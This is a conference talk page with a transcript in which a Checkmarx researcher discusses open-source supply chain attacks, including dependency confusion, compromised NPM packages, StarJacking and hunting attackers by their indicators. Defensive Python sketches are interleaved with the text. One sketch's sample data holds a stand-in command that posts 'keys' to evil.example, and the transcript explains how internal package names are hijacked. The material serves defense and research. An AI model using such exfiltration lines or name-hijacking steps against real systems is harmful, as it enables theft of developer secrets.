Conf42 Python 2022 - Online

Why attackers in Code packages are getting a Pass


Abstract

Presentation Outline

  1. Refresher on recent OSS attacks: a quick baseline of terminology and concepts, plus a focus on recent major attacks (PHP, dependency confusion, etc.).
  2. Lack of visibility. The Python Package Index (PyPI) deals with malicious packages by simply removing them, without publishing their code or metadata to a central point where they could be found and researched. Similarly, NPM removes all code and metadata and places a generic “security holding package” label on the package web page, although it does publish a security advisory with varying levels of specificity. As a result, researchers are unable to learn from detected malicious packages: no IOC or contributor data means no hunting for more code packages.
  3. Lack of validation. One example: the process of publishing a Python package to PyPI allows the publisher to link a GitHub repository to the package. PyPI then pulls the repository statistics straight from GitHub and presents them on the package web page. The problem is that there is no validation of the connection between the package and the repository. We will demonstrate this technique, which we came to call StarJacking.
  4. Lack of awareness. The entire ecosystem is focused on detecting known vulnerabilities, and many security teams believe this risk is covered by SCA products. This is not the case: vulnerabilities ≠ malware. We need a mindset shift and a new technology stack to detect attackers in code packages: reactive vs. proactive, static signatures vs. dynamic execution.
  5. Looking ahead. Most of what we do today in the field of malicious open-source software can best be described as patch management. The “cyber” point of view has yet to enter this game. In this spirit, some thoughts on where we should be heading:
     • Malware zoo -> code package hatchery
     • Sandbox for files -> detonation chambers for dynamic analysis of code
     • Cross-language detection
     • TTPs
     • Bonus: contributors’ reputation
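
The missing validation behind StarJacking can be illustrated with a small heuristic. This is only a sketch under stated assumptions, not how PyPI or any registry works: it assumes you have already collected a mapping from package name to the repository URL each package claims, and it flags repositories claimed by more than one package. The function names and the example package names are hypothetical.

```python
from __future__ import annotations

from urllib.parse import urlparse


def normalize_repo_url(url: str) -> str:
    """Reduce a repository URL to a comparable 'host/owner/name' key."""
    parsed = urlparse(url.strip())
    path = parsed.path.strip("/")
    if path.endswith(".git"):
        path = path[: -len(".git")]
    return f"{parsed.netloc.lower()}/{path.lower()}"


def find_shared_repos(claims: dict[str, str]) -> dict[str, list[str]]:
    """Return repositories that more than one package claims as its own.

    `claims` maps a package name to the repository URL in its metadata.
    A shared repository is not proof of malice (monorepos exist), only a
    reason to look closer.
    """
    by_repo: dict[str, list[str]] = {}
    for package, url in claims.items():
        by_repo.setdefault(normalize_repo_url(url), []).append(package)
    return {repo: sorted(pkgs) for repo, pkgs in by_repo.items() if len(pkgs) > 1}


if __name__ == "__main__":
    # Hypothetical metadata: "evil-lib" borrows the stars of "popular-lib".
    claims = {
        "popular-lib": "https://github.com/example-org/popular-lib",
        "evil-lib": "https://GitHub.com/example-org/popular-lib.git",
        "other-lib": "https://github.com/example-org/other-lib/",
    }
    for repo, packages in find_shared_repos(claims).items():
        print(repo, "is claimed by", packages)
```

A stricter check would confirm, from the repository side, that the repository actually builds the package that points at it. That step is left out here because it depends on the build layout of each project.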

Summary

  • Everybody is using open source. It helps develop products faster, and anybody can contribute code to an open source project. Do attackers contribute code as well? Well, the short answer is yes. Supply chain attacks are on the rise.
  • Attacks on popular NPM packages affect tens of thousands of organizations worldwide. ChainAlert is an early warning system offered free to everyone in the open source community. It was created to raise developer awareness and analyze account takeovers.
  • Most of what we are doing today is more of a reactive approach, meaning we wait for somebody else to flag those attacks and then we react to them. We need to have a central repository of malicious packages and their full metadata so researchers like me and others can hunt for OSS hackers and keep our ecosystem clean.

Transcript

This transcript was autogenerated. To make changes, submit a PR.
Hi guys, and welcome to my lecture, Why Attackers in Code Packages Are Getting a Pass. First, let me introduce myself. My name is Tzachi. I am the head of software supply chain at Checkmarx. I have many years of experience in cyber. I used to work at McAfee, Symantec, Palo Alto and, most recently, Checkmarx. My specialty is building advanced malware research systems.
So today I want to talk about open source. Everybody is using open source. It helps develop products faster, and anybody can contribute code to an open source project, which is a big part of why this ecosystem is so successful. Coming from a cyber background, I ask myself: do attackers contribute code as well? Well, the short answer is yes. Let us see. We have studied this attack surface, and all the recent attacks, for a really long time, and we are happy to share with you what we have learned about open source, which of course is part of the supply chain. And supply chain attacks are on the rise.
Let's take a couple of examples so it will be clear what we are talking about. The first example I want to give is dependency confusion. Dependency confusion is an attack technique that was discovered last year. It was used by an ethical hacker to hack into companies such as Microsoft, Apple and Netflix. It's a new type of open source supply chain attack, and in many cases this is not a bug, this is a feature. What usually happens is that a developer uses a combination of internal packages, in this example my company utils, and external packages like React, and the artifact server will fetch the relevant package. But as we can see, there is by default no clear indication of which package is private and which is public. So what can happen in this confusion, which is common, is that an attacker can guess, just guess, the name of an internal package and register it on NPM or Python or other languages.
And because anybody can register a package, if he succeeded in guessing the internal name, and if this is the default configuration, what will happen, as you can see, is that he will be able to get his package onto the developer's workstation. So if both names are the same, why would the artifact server choose the attacker's one? As you can see, a lot of the time a developer will specify "take the latest version", and an attacker can just give himself a very high version number for this attack to succeed.
This is not a hypothetical attack. We are seeing this kind of attack weekly. Just a couple of weeks ago we were able to track down and remove packages that were uploaded by an attacker called never summer 68. When you look at the package, the first thing you can see is the version number, which is not a typical version number. This is usually some kind of indication that this can be a dependency confusion. And if you look at the names, you can actually figure out which organization he was trying to target. If a developer installed one of these packages, the code stored inside it would automatically steal the developer's SSH keys and send them to an attacker-controlled website. So this attack is still ongoing, and we really believe in giving back to the community, so we have released an open source tool called Dustilock that helps monitor this kind of configuration and alerts you not to use those internal package names. Check it out.
Another attack that we saw a couple of months ago, with a very high impact, was one where two really popular NPM packages were compromised. An attacker actually uploaded malicious packages, which affected tens of thousands of organizations worldwide. The first package was UA parser, and as you can see, the parts pointed out in red are the malicious parts. So he added the first part, which actually downloads a password stealer, and then the second part, which actually downloads a crypto miner.
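
The dependency confusion mechanics described earlier in this passage (same name on two indexes, highest version wins) can be sketched in a few lines. This is a simplified model, not the behavior of any specific artifact server or package manager: it assumes purely numeric dotted versions, and the function names, index labels and package names are hypothetical.

```python
from __future__ import annotations


def parse_version(version: str) -> tuple[int, ...]:
    """Parse a purely numeric dotted version such as '1.4.2'.

    Real version schemes are richer; this is an assumption for the sketch.
    """
    return tuple(int(part) for part in version.split("."))


def resolve_latest(candidates: list[tuple[str, str]]) -> tuple[str, str]:
    """Pick the (source, version) pair with the highest version.

    This models a "take the latest version" policy that does not
    distinguish between a private and a public index.
    """
    return max(candidates, key=lambda candidate: parse_version(candidate[1]))


def confusable_names(internal_names: list[str], public_names: list[str]) -> list[str]:
    """Internal package names that also exist on a public index."""
    return sorted(set(internal_names) & set(public_names))


if __name__ == "__main__":
    # The attacker registers the internal name publicly with a huge version.
    candidates = [("internal", "1.4.2"), ("public", "99.0.0")]
    print(resolve_latest(candidates))
    print(confusable_names(["my-company-utils", "billing-core"],
                           ["react", "my-company-utils"]))
```

In this model the public copy wins purely because of its version number, which is why an unusually high version on a package carrying an internal-looking name is worth a second look.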
They were discovered and removed, and an official advisory was sent out by CISA. Two weeks later, the same attacker did the same thing, this time compromising packages called coa and rc. And as you can see, they are quite popular. In this instance he made a bug that made his attack unsuccessful, while still crippling a lot of build servers all around the world. We monitor those things constantly, and as we can see, those attacks are not isolated. We were actually able to find a prior attack regarding UA parser, and we track this attacker as UNC 3379 inside the industry. We don't think this will be his last attack. And of course those are not just attacks around NPM; they can happen in every open source language out there.
So as we say, we were able to detect this attacker, alert against him and write about the bugs he created. But this wasn't enough. Why is that? If we study the activity of the attacker, what we call TTPs, we can see that he is constantly compromising NPM accounts, doing what we call NPM account takeover. Usually an open source contributor will have one GitHub account where he stores his code and another account in NPM, in this example, but it could be Python or Maven or any other language, that stores the package. What the attacker is doing is compromising the NPM account. Why is that important? To learn about the habits, the tactics, techniques and procedures, of an attacker. So usually what happens is that when you store your code in GitHub, you then push it to NPM when you have the right tag. This is normal activity, and we have seen it many times. This is, for example, UA parser, and you can see a correlation between the tag and the package. Until the attack: the attacker uploaded three new versions to NPM, but he wasn't able to compromise the GitHub account, so we never saw their code in GitHub. This, of course, can be a reason for suspicion. And the reason they uploaded three different versions?
To make sure that, whatever update policy you are using, you will actually use one of those versions.
So the problem for us is that even if we are able, as a community, to detect and to alert, when you are talking about packages with millions of weekly downloads, in the amount of time it takes us to monitor, alert and take them down, there are still a lot of organizations being affected. We wanted to find an innovative way to stay ahead of the curve. For that, we have released for the community what we call ChainAlert. ChainAlert is an early warning system offered free to everyone in the open source community. Basically, what we are doing is monitoring new releases, and whenever we find a new release that has no corresponding code or activity in GitHub, we alert the maintainer: hey, we just saw a new package being released, but we never saw the code in GitHub. Is that okay or not? We are not saying those are malicious, but we are alerting and monitoring for suspicious activity. So if we find this kind of example and the attacker strikes again, we have a way to quickly identify and maybe avoid those suspicious packages. Right now, what we are doing is opening an issue for the original package's maintainer, and everybody who is subscribed to the project and is using one of those packages will get the issue automatically. So we created this to raise developer awareness and analyze account takeovers. And again, as I said, it's a free service for open source projects and the open source community. Feel free to join us or add some feature requests. We'll be happy to get your feedback, guys. So this is, of course, ChainAlert on GitHub.
So why are these attacks so hard to detect? Most of what we are doing today is more of a reactive approach, meaning we wait for somebody else to flag those attacks and then we react to them.
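
The release check described above (a new registry version with no corresponding tag in the source repository) can be approximated as follows. This is a minimal sketch and not ChainAlert's actual implementation: it assumes the published versions and the repository tags have already been fetched, and that tags are either the bare version or the version prefixed with "v". The function names are hypothetical.

```python
from __future__ import annotations


def normalize_tag(tag: str) -> str:
    """Strip a leading 'v' from tags such as 'v1.0.0' (assumed convention)."""
    if len(tag) > 1 and tag[0] == "v" and tag[1].isdigit():
        return tag[1:]
    return tag


def releases_without_tags(published_versions: list[str], repo_tags: list[str]) -> list[str]:
    """Return published versions that have no matching tag in the repository.

    A missing tag is only a signal worth asking the maintainer about,
    not evidence that the release is malicious.
    """
    tagged = {normalize_tag(tag) for tag in repo_tags}
    return [version for version in published_versions if version not in tagged]


if __name__ == "__main__":
    published = ["1.0.0", "1.0.1", "1.0.2"]
    tags = ["v1.0.0", "1.0.1"]
    for version in releases_without_tags(published, tags):
        print(f"release {version} has no matching tag, ask the maintainer")
```

Projects that publish from CI without tagging will trigger this check on every release, so in practice the result is better treated as a question to the maintainer than as a verdict.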
So we are not taking a proactive approach: we are not hunting, we are not automatically analyzing everything that's being uploaded. The problem with being reactive, waiting for somebody else to report it, is that it could lead to a long mean time to detection, meaning we can be under attack for a really long time until somebody else notices and we are then able to repair that. Another thing is that most of the industry still relies on static signatures. This could be a bit problematic when you're trying to stop an attacker because, as we all know in the cyber industry, static signatures are quite easy for an attacker to bypass.
So let me give you an example of what I mean by reactive versus proactive. I'm going to talk about hunting. We've been doing hunting for many years in cyber. Now, how can we hunt in open source? So our story begins with a really cool project I really like called Backstabber's Knife Collection, which is a couple of people just maintaining a list of malicious packages that were removed, in a central repository where researchers can actually take a look at them. So we are always looking for malicious packages, and for this example we'll start with a malicious package actually uploaded to Backstabber's. This package was actually flagged as malicious a couple of years ago, and we can see the basic code and what it was doing. But do we think this is a one-time incident, or is there an attacker behind it? And if so, what can we learn about this attacker? So every time we come across a malicious package, we don't just remove it or flag it. We are being proactive. We are hunting for it. What do I mean? I'll show you a couple of our methodologies. When we go hunting, we look at the metadata: what do we know about this account, this description, this repository, this home page, this owner? What do we know about the IOCs, the indicators of compromise, inside this package: the URL, the domain, the IP, the cryptocurrency?
And then, using our system, we automatically create a unique import compose, and then we start looking for suspicious packages in other languages as well. Although we started in Python, based on the unique characteristics that I've shown you, we were actually able to find live packages a couple of years after the first package was removed. So those packages were actually still active, and we reported them to Python, to NPM, to Ruby, to have them removed.
This is not something unique. We need to understand that this is not a vulnerability, this is not a bug that we just remove. Those are attackers. And we need to change our mindset about how we approach attackers, how we track them, how we hunt them down. We have made this mind shift in cyber with IR. We need to embrace the same mind shift in open source in order to keep our ecosystem clean. So for me this talk is actually a call to action, as a researcher who wants to keep the open source community clean. We need to have some kind of central repository of malicious packages. I really like Backstabber's, but I think that we need more commitment from the major players in the field to a central repository of malicious packages and their full metadata, so researchers like me and others can hunt for OSS hackers and keep our ecosystem clean.
Thank you, guys. I hope you found it interesting, and I hope we shed some light on recent open source attacks and attackers, and on the mindset we believe we need in order to not give them a pass: track them, find them, and keep the ecosystem clean. Thank you, guys, and have a great day.
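
The hunting workflow from the talk (take the IOCs of one known malicious package, then look for other packages that share them) can be sketched as below. This is an illustration under stated assumptions, not the speaker's system: it assumes package sources are available as plain strings, it only extracts URLs and IPv4-looking strings with simple regular expressions, and all names and sample data are hypothetical.

```python
from __future__ import annotations

import re

# Deliberately simple patterns; they will produce false positives
# (for example, a four-part version number looks like an IPv4 address).
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(source: str) -> set[str]:
    """Collect URL and IPv4-looking strings from a package's source text."""
    return set(URL_RE.findall(source)) | set(IPV4_RE.findall(source))


def hunt(known_iocs: set[str], packages: dict[str, str]) -> dict[str, set[str]]:
    """Return packages whose source shares at least one known IOC."""
    hits: dict[str, set[str]] = {}
    for name, source in packages.items():
        shared = extract_iocs(source) & known_iocs
        if shared:
            hits[name] = shared
    return hits


if __name__ == "__main__":
    # Seed: source of a package already flagged as malicious (hypothetical).
    seed_source = 'requests.post("http://evil.example/collect", data=keys)'
    known = extract_iocs(seed_source)

    # Candidate packages, possibly from other language ecosystems.
    candidates = {
        "pkg-a": "fetch('http://evil.example/collect')",
        "pkg-b": "print('hello')",
    }
    print(hunt(known, candidates))
```

Because the match is on the indicator rather than on the code, the same seed can surface packages written in a different language, which is the cross-ecosystem effect described in the talk. Account, description and repository metadata could be compared in the same way.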

Tzachi Zornstain

Head of CxDustico @ Checkmarx



